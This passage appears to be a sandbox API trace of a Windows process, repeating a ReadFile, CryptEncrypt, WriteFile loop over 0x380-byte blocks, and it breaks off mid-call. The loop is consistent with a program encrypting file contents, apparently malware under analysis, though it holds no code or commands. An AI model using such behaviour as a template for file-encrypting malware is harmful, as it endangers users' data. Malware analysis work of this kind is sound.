returned 1 [0276.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.606] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.608] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.609] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.610] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.611] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.611] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] ReadFile (in: 